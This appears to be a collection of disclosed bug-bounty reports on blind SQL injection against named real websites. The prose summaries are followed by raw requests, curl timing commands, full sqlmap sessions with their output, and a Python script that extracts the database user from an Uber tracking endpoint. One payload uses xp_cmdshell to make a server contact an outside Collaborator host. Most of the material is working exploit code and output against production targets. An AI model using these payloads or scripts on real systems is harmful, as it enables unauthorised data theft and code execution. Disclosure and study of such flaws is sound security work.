After subscribing to Uber in China, an advertisement was sent to the associated email account. The unsubscribe link in the email is different than the normal Uber unsubscribe link.
Researcher discovered Time Based Blind SQLi on the news.starbucks.com domain. The vulnerability exists on a HTTP POST request to the home path of the Starbucks domain in the group_id body parameter. The request with payload is illustrated below:
The request successfully delays the server response time.
The researcher also illustrates how to determine the database version through the following requests using curl:
You can see the response time for version 5 is greater than version 4 meaning the sleep command executed on the first request (version 5) proving the database version is 5.
Exploiting the vulnerability using SQLMap and retrieving the available databases and DBMS info as a PoC:
The URL https://redacted.com/dwr/exec/EndUserSvc.validateCageCode?callCount=1&c0-scriptName=EndUserSvc&c0-methodName=validateCageCode&c0-id=5096_1489967152565&c0-param0=string:1 contains a URL parameter c0-param that is vulnerable to Blind SQLi.
In the example below, the researcher uses SQLMap to exploit the vulnerability. On line 68 below, SQLMap displays the database type as a Proof of Concept.
The API interface on https://contactws.contact-sys.com:3456/ accepts a <REQUEST/> body to interact with the server's AppServ object. Because of insufficient input validation, an attacker can abuse the SCEN_ID parameter to inject arbitrary SQL statements into the WHERE clause of the underlying SQL statement. This leads to a blind SQL injection vulnerability, which in turn leads to Remote Code Execution on the server.
The unedited HTTP POST Request
The researcher makes use of Burp Suite's Collaborator which is a network service tool that can be used to detect out-of-band SQL injection. In short, this works by providing a unique subdomain which is used in the payload. Using the unique subdomain in the payload, the backend server reaches out to the Burp Collaborator server as it does a DNS lookup of the subdomain. There are other uses for the Burp Collaborator, such as out-of-band exfiltration, but this is enough of a PoC to prove that the server is vulnerable to Blind out-of-band SQLi.
Modifying the SCEN_ID body parameter to use xp_cmdshell and ping the Burp Suite Collaborator server with the unique subdomain generated (yhjbc2mndl88o89il3ueyud7zy5pte.burpcollaborator.net). This will make a DNS request to the burpcollaborator.net server with the unique subdomain.
Issuing the request will successfully cause the web server to do a DNS lookup of the domain. The server can be seen reaching out to Burp Suite's Collaborator with the unique subdomain (yhjbc2mndl88o89il3ueyud7zy5pte.burpcollaborator.net).
The researcher also used SQLMap to exploit this vulnerability and retrieve the database name. The sqlitest.txt file is the above HTTP POST request.
The lang cookie parameter was found to be vulnerable to SQLI. The request was sent with the following payload, and the server will delayed the response:
The HTTP URL redId parameter on http://viestinta.lahitapiola.fi/webApp/cancel_iltakoulu?regId=478836614&locationId=464559674 is vulnerable to Blind SQLi. The researcher illustrates this through the use of SQLMap.
The path gets filtered on the backend as a tag and upon retrieving the request it searches for the tag. The path https://betterscience.org/plugin/tag/ filters anything prepended to the URL path as a tag and displays the output. By issuing it a specifically crafted SQL request it is possible to trigger Blind SQLi.
HTTP JSON POST parameter docid is vulnerable to Blind SQLi.
Quoting qonqi:
for a TRUE query we get - {"d":"3"}
for a FALSE - {"d":""}
for a Syntax error - {"Message":"There was an error processing the request.","StackTrace":"","ExceptionType":""}
so using this blind technique we can extract the data from Database
examples
docId:"1 and (select substring(@@version,1,1))='M'" - true
docId:"1 and (select substring(@@version,2,1))='i'" - true
docId:"1 and (select substring(@@version,3,1))='c'" - true
docId:"1 and (select substring(@@version,22,1))='2'"
docId:"1 and (select substring(@@version,23,1))='0'"
docId:"1 and (select substring(@@version,24,1))='0'"
docId:"1 and (select substring(@@version,25,1))='8'"
The topsort URL parameter on https://www.tube8.fr/ajax-hof/?toplimit=2&topsort=followers+or+sleep(0.000000001) is vulnerable to Blind SQLi.
The request below contains the payload in the URL parameter. The researcher stated that any larger value in the sleep function makes the application timeout, possibly due to the injection point being in a WHERE statement which is executing for every record in the table.
There is a HTTP GET URL parameter that is vulnerable to Blind SQL Injection at https://βββ/pubs/get_publications.php, pub_group_id is the parameter.
Payload below contains a 5 second delay in response in the pub_group_id parameter. Issuing the request successfully delays the response by 5 seconds.
The researcher used SQLMap to exploit the vulnerability. The test.txt file contains the above HTTP GET request (without the payload).
Researcher discovered the labs.data.gov website has a route /dashboard/datagov/csv_to_json that is vulnerable to Blind SQLi on the User-Agent HTTP Header.
Appending the following payload to the User-Agent Header delays the response time by 25 seconds:
'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
The appended payload can be seen in the request below. Issuing the response below, the researcher successfully illustrated that the server takes 25 seconds to respond.
The doc_id URL Parameter on the /library.php route was found to be vulnerable to Blind SQLi. Issuing the request below makes the server delay it's response by 5 seconds. The payload 1 AND (SELECT * FROM (SELECT(SLEEP(1)))WUeh) is URL encoded and placed into the doc_id URL parameter.
Researcher discovered the countID URL parameter on the route https://www.xn--4zhaa/public/saveCount.cfm?countID=4 is vulnerable to Blind SQLi. Illustrated below, the researcher uses SQLMap to exploit the vulnerability and retrieve the banner for the database.
The route https://βββ/hro/html/tech.cfm?Sort=SLEEP(25)&ThisType=3 contains the URL parameter S Sort which is vulnerable to Blind SQLi. Issuing the request to the URL with the payload SLEEP(25) will delay the servers response by 25 seconds.
HTTP POST request rememail body parameter is vulnerable to Blind SQLi.
The researcher illustrates how to retrieve the database version through blind SQLi. This will either create a 2 second delay if true, if not the response will be immediate. This can used to iterate over each possible version number to detect which version is currently in use.
{"user_id": "5755 and sleep(12)=1", "receiver": "orange@mymail"}
{"user_id": "5755", "receiver": "orange@mymail"}
import json
import string
import requests
from urllib import quote
from base64 import b64encode
base = string.digits + '_-@.'
payload = {"user_id": 5755, "receiver": "blog.orange.tw"}
for l in range(0, 30):
for i in 'i'+base:
payload['user_id'] = "5755 and mid(user(),%d,1)='%c'#"%(l+1, i)
new_payload = json.dumps(payload)
new_payload = b64encode(new_payload)
r = requests.get('http://sctrack.email.uber.com.cn/track/unsubscribe.do?p='+quote(new_payload))
if len(r.content)>0:
print i,
break
POST / HTTP/1.1
Host: news.starbucks.com
Connection: close
Content-Length: 81
Cache-Control: max-age=0
Origin: https://news.starbucks.com
Content-Type: application/x-www-form-urlencoded
ACT=55&jsontree={"x":1}&site_id=1&group_id=1'-IF(1=1,SLEEP(1),0) AND group_id='1
time curl --data "ACT=55&jsontree={"x":1}&site_id=1&group_id=1'-IF(MID(VERSION(),1,1)='5',SLEEP(1),0) AND group_id='1" https://news.starbucks.com
real 0m4.945s
time curl --data "ACT=55&jsontree={"x":1}&site_id=1&group_id=1'-IF(MID(VERSION(),1,1)='4',SLEEP(1),0) AND group_id='1" https://news.starbucks.com
real 0m1.005s
root@kali:~/bugbounty# sqlmap -u "https://ββββ/βββββββββ/dwr/exec/EndUserSvc.validateCageCode?callCount=1&c0-scriptName=EndUserSvc&c0-methodName=validateCageCode&c0-id=5096_1489967152565&c0-param0=string:1*"
_
___ ___| |_____ ___ ___ {1.0.8.2#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:21:54
custom injection marking character ('*') found in option '-u'. Do you want to pry
[20:22:03] [INFO] testing connection to the target URL
[20:22:04] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[20:22:04] [INFO] testing if the target URL is stable
[20:22:05] [INFO] target URL is stable
[20:22:05] [INFO] testing if URI parameter '#1*' is dynamic
[20:22:05] [WARNING] URI parameter '#1*' does not appear dynamic
[20:22:05] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'Oracle')
[20:22:05] [INFO] testing for SQL injection on URI parameter '#1*'
it looks like the back-end DBMS is 'Oracle'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'Oracle' extending provided level (1) and risk (1) values? [Y/n] y
[20:22:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:22:20] [WARNING] reflective value(s) found and filtering out
[20:22:21] [INFO] testing 'Oracle boolean-based blind - Parameter replace'
[20:22:22] [INFO] testing 'Oracle boolean-based blind - Parameter replace (original value)'
[20:22:22] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause'
[20:22:23] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[20:22:24] [INFO] testing 'Oracle boolean-based blind - Stacked queries'
[20:22:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:22:50] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (XMLType)'
[20:23:00] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[20:23:10] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)'
[20:23:21] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[20:23:33] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)'
[20:23:42] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)'
[20:23:43] [INFO] URI parameter '#1*' is 'Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)' injectable
[20:23:43] [INFO] testing 'Oracle inline queries'
[20:23:43] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:23:43] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)'
[20:23:43] [INFO] testing 'Oracle stacked queries (heavy query - comment)'
[20:23:44] [INFO] testing 'Oracle stacked queries (heavy query)'
[20:23:44] [INFO] testing 'Oracle stacked queries (DBMS_LOCK.SLEEP - comment)'
[20:23:44] [INFO] testing 'Oracle stacked queries (DBMS_LOCK.SLEEP)'
[20:23:44] [INFO] testing 'Oracle stacked queries (USER_LOCK.SLEEP - comment)'
[20:23:44] [INFO] testing 'Oracle stacked queries (USER_LOCK.SLEEP)'
[20:23:45] [INFO] testing 'Oracle AND time-based blind'
[20:23:45] [INFO] testing 'Oracle OR time-based blind'
[20:23:45] [INFO] testing 'Oracle AND time-based blind (comment)'
[20:23:45] [INFO] testing 'Oracle OR time-based blind (comment)'
[20:23:45] [INFO] testing 'Oracle AND time-based blind (heavy query)'
[20:24:16] [WARNING] turning off pre-connect mechanism because of connection time out(s)
[20:24:46] [INFO] URI parameter '#1*' appears to be 'Oracle AND time-based blind (heavy query)' injectable
[20:24:46] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 418 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)
Payload: https://βββββ:443/βββββ/dwr/exec/EndUserSvc.validateCageCode?callCount=1&c0-scriptName=EndUserSvc&c0-methodName=validateCageCode&c0-id=5096_1489967152565&c0-param0=string:1' AND 9965=DBMS_UTILITY.SQLID_TO_SQLHASH((CHR(113)||CHR(106)||CHR(106)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (9965=9965) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(98)||CHR(112)||CHR(113)))-- Goij
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: https://ββββββ:443/ββββ/dwr/exec/EndUserSvc.validateCageCode?callCount=1&c0-scriptName=EndUserSvc&c0-methodName=validateCageCode&c0-id=5096_1489967152565&c0-param0=string:1' AND 4917=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)-- vKNF
---
[20:34:42] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[20:34:42] [INFO] fetched data logged to text files under '/root/.sqlmap/output/ββββββββββ'
[*] shutting down at 20:34:42
~/sqlmap# ./sqlmap.py -u "http://viestinta.lahitapiola.fi/webApp/cancel_iltakoulu?regId=478836614&locationId=464559674" -p regId
.. snip ..
GET parameter 'regId' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 56 HTTP(s) requests:
Parameter: regId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: regId=478836614) AND 5454=5454 AND (5202=5202&locationId=464559674
[17:38:22] [INFO] the back-end DBMS is PostgreSQL
web application technology: Apache
back-end DBMS: PostgreSQL
15:25 ~: time curl "http://www.lahitapiola.fi/cs/Satellite?blobcol=urldata&blobkey=id&blobtable=MungoBlobs&blobwhere=1310812269330%27%20AND%205851=DBMS_PIPE.RECEIVE_MESSAGE(1000,5)%20AND%20%27bar%27=%27bar" -O /dev/null
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1019 100 1019 0 0 196 0 0:00:05 0:00:05 --:--:-- 256
curl: (3) <url> malformed
real 0m5.186s
user 0m0.004s
sys 0m0.008s
https://stats2.agilecrm.com/addstats?callback=json949659033379064&guid=f0d3738c-44c0-60a6-44b6-56e14ca30872&sid=2172c2ca-15b6-49c8-052d-b7d817cd280b&url=https%3A%2F%2Frocket.chat%2F&agile=8pat9ou8gh0thqd8dlgctje3go&new=(select*from(select(sleep(5)))a)&ref=&domain=dorgam
#Output presumably from sqlmap
Database version: MySQL 5.0.12
Server hostname: localhost
Databases: information_schema; mysql; performance_schema; stats
Stats: 3; persons; map.
python sqlmap.py -u https://www.xn--4zhaaaaaaaaa/public/saveCount.cfm?countID=4 --level=3 --risk=3
#Output
Microsoft SQL Server 2008 R2 (SP3) - 10.50.6220.0 (X64&
Mar 19 2015 12:32:14
Copyright (c) Microsoft Corporation
Standard Edition (64-bit) on Windows NT 6.3 <X64> (Build 9600: ) (Hypervisor)
GET /api/tweets?city_id=(select(0)from(select(sleep(25)))v) HTTP/1.1
Host: windows10.hi-tech.mail.ru
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: Vββββββββ
Connection: close
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Thu, 30 Jan 2020 10:05:07 GMT
Content-Type: text/json; charset=utf-8
Connection: close
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 50
{"status":"ok","last_id":0,"data":[],"total":"0"}
